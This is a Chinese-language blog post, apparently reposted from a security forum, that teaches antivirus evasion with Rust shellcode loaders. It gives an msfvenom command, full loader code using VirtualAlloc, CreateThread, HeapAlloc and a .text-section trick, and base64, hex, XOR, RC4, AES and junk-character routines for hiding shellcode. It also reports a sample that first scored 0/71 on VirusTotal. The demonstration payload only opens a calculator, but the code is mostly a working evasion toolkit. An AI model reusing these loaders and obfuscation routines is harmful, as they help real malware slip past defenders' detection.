扫码领资料
获黑客教程
免费&进群
这是半年前我学习Rust和免杀时的一些记录,最近打开知识库看到了这篇半年前的笔记,并且发现我常逛的安全社区都比较少有人分享Rust以及Rust免杀的帖子,于是想着将这篇笔记分享出来供大家参考和指正。由于我写这篇文章时也刚刚开始接触Rust,所以文中所涉及的知识和代码都有可能出现错误,所以再次说明这篇文章仅供参考并希望大家指正。
本文的主要目的是分享Rust对shellcode的加密混淆方式,所以对于shellcode加载只介绍两种基本的方式,可能在后续的文章中会对加载方式进行更多分享。
跟其他语言的shellcode加载器一样,要实现更多的shellcode加载方式,需要调用WinAPI。
执行shellcode的一般流程:
1. 创建或获取一段可读写执行的内存空间
2. 将shellcode移入这块内存空间
3. 利用各种方式将程序执行的流程指向这块内存空间
Rust调用WinAPI需要先引入依赖,Cargo
是Rust的一个包管理工具,要引入winapi
依赖需要在Cargo.toml
添加:
winapi = {version="0.3.9",features=["winuser","processthreadsapi","memoryapi","errhandlingapi","synchapi"]}
这里以加载msf生成的弹计算器的shellcode为例,先使用msfvenom
生成一段raw格式的shellcode,保存到calc.bin
文件中,并复制到Rust的项目目录下。
msfvenom -p windows/x64/exec cmd=calc.exe -f raw -o calc.bin
在Rust中,可以使用include_bytes!
宏将静态文件在编译时包含进程序中。
下面通过调用VirtualAlloc
申请一段内存,并设置为PAGE_EXECUTE_READWRITE
权限,具体参数建议查阅微软WinAPI文档。然后通过std::ptr::copy
将shellcode移动到内存中,接着通过CreateThread
创建线程,WaitForSingleObject
等待线程结束。
参考:VirtualAlloc function, CreateThread function, WaitForSingleObject function
use std::mem::transmute;
use winapi::um::errhandlingapi::GetLastError;
use winapi::um::memoryapi::VirtualAlloc;
use winapi::um::processthreadsapi::CreateThread;
use winapi::um::synchapi::WaitForSingleObject;fn main() {
let buffer = include_bytes!("..\\calc.bin");unsafe {
let ptr = VirtualAlloc(std::ptr::null_mut(), buffer.len(), 0x00001000, 0x40);if GetLastError() == 0 {
std::ptr::copy(buffer.as_ptr() as *const u8, ptr as *mut u8, buffer.len());let mut threadid = 0;
let threadhandle = CreateThread(
std::ptr::null_mut(),
0,
Some(transmute(ptr)),
std::ptr::null_mut(),
0,
&mut threadid,
);WaitForSingleObject(threadhandle, 0xFFFFFFFF);
} else {
println!("执行失败:{}", GetLastError());
}
}
}
link_section
是Rust的一个attribute,它用来将特定的函数或者变量放到程序的指定的区块中,.text
区块通常用来存储程序的执行代码,它会被加载到内存中并由处理器执行。
然后通过std::mem::transmute
将 *const u8
类型的指针转换为函数类型 fn()
,最后执行shellcode。
fn main() {
const BUFFER_BYTES:&[u8] = include_bytes!("..\\calc.bin");
const BUFFER_SIZE:usize = BUFFER_BYTES.len();#[link_section = ".text"]
static BUFFER:[u8;BUFFER_SIZE] = *include_bytes!("..\\calc.bin");
unsafe{
let exec = std::mem::transmute::<*const u8,fn()>(&BUFFER as *const u8);
exec();
}
}
由于VirtualAlloc
是各大杀软的重点监控对象,所以通常需要使用其他的API来替代,下面介绍的是另一个常见的内存申请方式,即通过HeapCreate/HeapAlloc
的组合来创建内存空间。
参考:HeapCreate function, HeapAlloc function
该方式同样需要先引入依赖,在Cargo.toml
文件中添加如下依赖:
[dependencies]
winapi = {version="0.3.9",features=["winuser","heapapi","errhandlingapi"]}
该方法通过HeapCreate
创建HEAP_CREATE_ENABLE_EXECUTE
权限的内存堆,然后通过HeapAlloc
来从堆中分配内存空间,最后通过函数指针的方式执行shellcode。
use std::mem::transmute;
use winapi::ctypes::c_void;
use winapi::um::errhandlingapi::GetLastError;
use winapi::um::heapapi::HeapAlloc;
use winapi::um::heapapi::HeapCreate;fn main() {
let buffer = include_bytes!("..\\calc.bin");unsafe {
let heap = HeapCreate(0x40000, 0, 0);
let ptr = HeapAlloc(heap, 8, buffer.len());if GetLastError() == 0 {
std::ptr::copy(buffer.as_ptr() as *const u8, ptr as *mut u8, buffer.len());
let exec = transmute::<*mut c_void, fn()>(ptr);
exec();
}
}
}
上面介绍了在Rust中为shellcode申请内存空间和执行shellcode的几种常见的方式,接下来会介绍几种常见的编码和加密混淆方式在Rust中的实现。在实际的shellcode免杀的时候经常需要结合几种混淆方式,或者是自己设计加密混淆方式。
在Rust中实现base64编码同样需要引入依赖,在Cargo.toml
文件中添加如下依赖:
[dependencies]
base64 = "0.20.0"
通过下面的代码即可将传入的切片类型的shellcode进行base64编码并返回一段字符串。
fn b64_enc(shellcode: &[u8]) -> String {
base64::encode(shellcode)
}
通过以下代码即可将得到的字符串解码,并返回Vec数组类型的shellcode。
fn b64_dec(shellcode:String) -> Vec<u8> {
base64::decode(shellcode).expect("Error")
}
在Rust中实现Hex编码同样需要引入依赖,在Cargo.toml
文件中添加如下依赖:
[dependencies]
hex = "0.4.3"
通过下面的代码即可将传入的切片类型的shellcode进行Hex编码并返回一段字符串。
fn hex_enc(shellcode: &[u8]) -> String {
hex::encode(shellcode)
}
通过以下代码即可将得到的字符串解码,并返回Vec数组类型的shellcode。
fn hex_dec(shellcode:String) -> Vec<u8> {
hex::decode(shellcode).expect("Error")
}
通过迭代器将shellcode与key逐个字符进行异或,然后进行base64编码返回一段字符串。
要进行解密,需要先进行base64解码,然后将异或加密后的shellcode再次与key进行逐个字符进行异或,即可还原shellcode。
fn xor_encrypt(shellcode: &[u8], key: &[u8]) -> String {
let mut encrypted = Vec::new();
for (i, &b) in shellcode.iter().enumerate() {
encrypted.push(b ^ key[i % key.len()]);
}
base64::encode(&encrypted)
}fn xor_decrypt(encrypted: &[u8], key: &[u8]) -> Vec<u8> {
let encrypted = base64::decode(encrypted).expect("msg");
let mut decrypted = Vec::new();
for (i, &b) in encrypted.iter().enumerate() {
decrypted.push(b ^ key[i % key.len()]);
}
decrypted
}
Rust要实现RC4加密与加密需要引入依赖,在Cargo.toml
文件中添加下面的依赖。
[dependencies]
rust-crypto="0.2.36"
base64="0.13.0"
rustc-serialize = "0.3"
下面是实现RC4加解密的代码,在加密的函数中最终返回的是Base64编码后的字符串,而解密函数最终返回的是Vec数组,这是为了方便在shellcode loader中读取加密后的shellcode以及加载解密后的shellcode。
use crypto::rc4::Rc4;
use crypto::symmetriccipher::SynchronousStreamCipher;
use std::iter::repeat;fn main() {
let buffer = include_bytes!("..\\calc.bin").as_slice();
let key = "pRNtb343heAlnPFw5QiPHKxz3Z1dzLsqhiUyBNtTiI21DjUsZ0";let b64_string = enc(buffer, key);
let shellcode = dec(b64_string.as_str(), key);println!("== RC4 ==");
println!("Key: {}", key);
println!("\nEncrypted (Base-64): {}", b64_string);
println!("\nDecrypted: {:?}", shellcode);
}fn enc(shellcode: &[u8], key: &str) -> String {
let mut rc4 = Rc4::new(key.as_bytes());let mut result: Vec<u8> = repeat(0).take(shellcode.len()).collect();
rc4.process(shellcode, &mut result);base64::encode(&mut result)
}fn dec(b64: &str, key: &str) -> Vec<u8> {
let mut result = match base64::decode(b64) {
Ok(result) => result,
_ => "".as_bytes().to_vec(),
};let mut rc4 = Rc4::new(key.as_bytes());
let mut shellcode: Vec<u8> = repeat(0).take(result.len()).collect();
rc4.process(&mut result[..], &mut shellcode);shellcode
}
Rust要实现AES加密与加密也需要引入依赖,在Cargo.toml
文件中添加下面的依赖。
[dependencies]
aes="0.7.5"
hex="0.4.3"
block-modes="0.8.1"
hex-literal="0.3.3"
下面是实现AES-CFB加解密的代码,在加密的函数中最终返回的是Hex编码后的字符串,而解密函数最终返回的是Vec数组,同样是为了方便在shellcode loader中读取加密后的shellcode以及加载解密后的shellcode。
use aes::Aes128;
use block_modes::block_padding::Pkcs7;
use block_modes::{BlockMode, Cfb};
use hex::encode;
use hex_literal::hex;type Aes128ECfb = Cfb<Aes128, Pkcs7>;
fn main() {
let shellcode = include_bytes!("..\\calc.bin").as_slice();
let key = "gWW8QklFyVIQfpDN";
let iv = hex!("57504c385a78736f336b4946426a626f");println!("==128-bit AES CFB Mode==");
println!("Key: {}", key);
println!("iv: {}", encode(iv));let encrypted = enc(shellcode, key, iv);
println!("\nEncrypted: {}", encrypted);let decrypted = dec(encrypted.as_str(), key, iv);
println!("\nDecrypted: {:?}", decrypted);
}fn enc(shellcode: &[u8], key: &str, iv: [u8; 16]) -> String {
let key = key.as_bytes().to_vec();let cipher = Aes128ECfb::new_from_slices(key.as_slice(), iv.as_slice()).unwrap();
let pos = shellcode.len();
let mut buffer = [0u8; 2560];
buffer[..pos].copy_from_slice(shellcode);let ciphertext = cipher.encrypt(&mut buffer, pos).unwrap();
hex::encode(ciphertext)
}fn dec(encrypted: &str, key: &str, iv: [u8; 16]) -> Vec<u8> {
let binding = hex::decode(encrypted).expect("Decoding failed");
let ciphertext = binding.as_slice();let key = key.as_bytes().to_vec();
let cipher = Aes128ECfb::new_from_slices(key.as_slice(), iv.as_slice()).unwrap();
let mut buf = ciphertext.to_vec();
let shellcode = cipher.decrypt(&mut buf).unwrap();shellcode.to_vec()
}
同样先在Cargo.toml
文件中添加下面的依赖。
[dependencies]
hex = "0.4.3"
下面是结合异或加密和添加随机字符的代码,xor_encrypt
将对shellcode与key进行异或,使用hex::encode
将异或结果转为十六进制字符串返回,方便后面添加随机字符。add_random
迭代xor_encrypt
返回的字符串的每个字符,并在每次迭代时添加一个随机字符。最后,使用 hex::encode
将结果转为十六进制字符串返回。xor_decrypt
和rm_random
是对应的二次异或和删除随机字符的函数。
fn xor_encrypt(shellcode: &[u8], key: &[u8]) -> String {
let mut encrypted = Vec::new();
for (i, &b) in shellcode.iter().enumerate() {
encrypted.push(b ^ key[i % key.len()]);
}
hex::encode(&encrypted)
}fn xor_decrypt(encrypted: &[u8], key: &[u8]) -> Vec<u8> {
let encrypted = hex::decode(encrypted).expect("Error");let mut decrypted = Vec::new();
for (i, &b) in encrypted.iter().enumerate() {
decrypted.push(b ^ key[i % key.len()]);
}
decrypted
}fn add_random(xor_string: &str, key: &str) -> String {
let mut result = String::new();for (i, c) in xor_string.chars().enumerate() {
result.push(c);
result.push(key.chars().nth(i % key.len()).unwrap());
}
hex::encode(&result)
}fn rm_random(random_string: &str) -> Vec<u8> {
let mut result = String::new();let random_string = hex::decode(random_string).expect("Invalid String");
let random_string = match std::str::from_utf8(random_string.as_slice()) {
Ok(s) => s,
Err(_) => "Invalid UTF-8 sequence",
};for (i, c) in random_string.chars().enumerate() {
if i % 2 == 0 {
result.push(c);
}
}
result.as_bytes().to_vec()
}
Rust的编译体积是非常小的,虽然比不上C/C++,但是和Python和Go相比优势还是非常大的,并且Rust的热门程度也远小于Python和Go,所以杀软对Rust的检出程度也是非常低的,这都是Rust免杀的天然优势。结合本文章几种基础的加载方式和混淆方式还是可以轻松过一部分杀软的。以下链接是我半年前上传到virustotal的一个样本,半年过去了,目前的检出率为14/71:VirusTotal File(刚上传时检出率为0/71)。
这篇文章的代码部分我也已经提交到Github供大家参考:
https://github.com/colind0pe/AV-Bypass-Learning/tree/master/rust-bypass-av
https://rustwiki.org/zh-CN/reference/
https://learn.microsoft.com/en-us/windows/win32/api/
https://doc.rust-lang.org/std/macro.include_bytes.html
https://doc.rust-lang.org/reference/abi.html#the-link_section-attribute
原文地址:https://xz.aliyun.com/t/12618
声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权!
(hack视频资料及工具)
(部分展示)
往期推荐
给第一次做渗透项目的新手总结的一些感悟
「登陆页面」常见的几种渗透思路与总结!
突破口!入职安服后的经验之谈
红队渗透下的入口权限快速获取
攻防演练|红队手段之将蓝队逼到关站!
CNVD 之5000w通用产品的收集(fofa)
自动化挖掘cnvd证书脚本
Xray捡洞中的高频漏洞
实战|通过供应链一举拿下目标后台权限
实战|一次真实的域渗透拿下域控(内网渗透)
看到这里了,点个“赞”、“再看”吧